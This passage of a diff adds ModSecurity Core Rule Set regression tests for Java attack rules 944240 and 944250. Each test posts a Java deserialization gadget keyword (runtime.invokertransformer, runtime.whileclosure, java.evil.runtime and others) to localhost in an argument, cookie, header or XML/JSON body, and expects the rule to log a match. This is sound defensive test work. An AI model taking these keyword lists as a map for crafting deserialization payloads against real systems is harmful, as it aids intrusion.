"HTTP/1.0" + data: "runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-51 + desc: "Nested XML element value includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-52 + desc: "Content-Type text/plain includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log_contains: "id \"944240\"" + - test_title: 944240-53 + desc: "Content-Type application/json arg value includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.invokertransformer\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-54 + desc: "Content-Type application/json arg name includes keyword runtime.invokertransformer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.invokertransformer\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-55 + desc: "Argument test includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-56 + desc: "Argument name includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-57 + desc: "Cookie test includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-58 + desc: "Cookie name includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeclonefactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-59 + desc: "Request header test includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeclonefactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-60 + desc: "XML attribute value includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-61 + desc: "XML element value includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-62 + desc: "Nested XML element value includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-63 + desc: "Content-Type text/plain includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-64 + desc: "Content-Type application/json arg value includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeclonefactory\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-65 + desc: "Content-Type application/json arg name includes keyword runtime.prototypeclonefactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.prototypeclonefactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-66 + desc: "Argument test includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-67 + desc: "Argument name includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-68 + desc: "Cookie test includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-69 + desc: "Cookie name includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeserializationfactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-70 + desc: "Request header test includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-71 + desc: "XML attribute value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-72 + desc: "XML element value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-73 + desc: "Nested XML element value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-74 + desc: "Content-Type text/plain includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log_contains: "id \"944240\"" + - test_title: 944240-75 + desc: "Content-Type application/json arg value includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeserializationfactory\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-76 + desc: "Content-Type application/json arg name includes keyword runtime.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.prototypeserializationfactory\": \"test\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-77 + desc: "Argument test includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-78 + desc: "Argument name includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "runtime.whileclosure=test" + output: + log_contains: "id \"944240\"" + - test_title: 944240-79 + desc: "Cookie test includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-80 + desc: "Cookie name includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.whileclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-81 + desc: "Request header test includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-82 + desc: "XML attribute value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944240\"" + - test_title: 944240-83 + desc: "XML element value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-84 + desc: "Nested XML element value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-85 + desc: "Content-Type text/plain includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log_contains: "id \"944240\"" + - test_title: 944240-86 + desc: "Content-Type application/json arg value includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.whileclosure\"}" + output: + log_contains: "id \"944240\"" + - test_title: 944240-87 + desc: "Content-Type application/json arg name includes keyword runtime.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"runtime.whileclosure\": \"test\"}" + output: + log_contains: "id \"944240\"" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml new file mode 100644 index 000000000..eedd259ac --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml @@ -0,0 +1,453 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944250.yaml" + description: "Positive tests for rule 944250" +tests: + - test_title: 944250-0 + desc: "Argument test includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-1 + desc: "Argument name includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.runtime=test" + output: + log_contains: "id \"944250\"" + - test_title: 944250-2 + desc: "Cookie test includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.evil.runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-3 + desc: "Cookie name includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.evil.runtime=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-4 + desc: "Request header test includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.evil.runtime + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-5 + desc: "XML attribute value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944250\"" + - test_title: 944250-6 + desc: "XML element value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log_contains: "id \"944250\"" + - test_title: 944250-7 + desc: "Nested XML element value includes keyword java.evil.runtime" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.evil.runtime" + output: + log_contains: "id 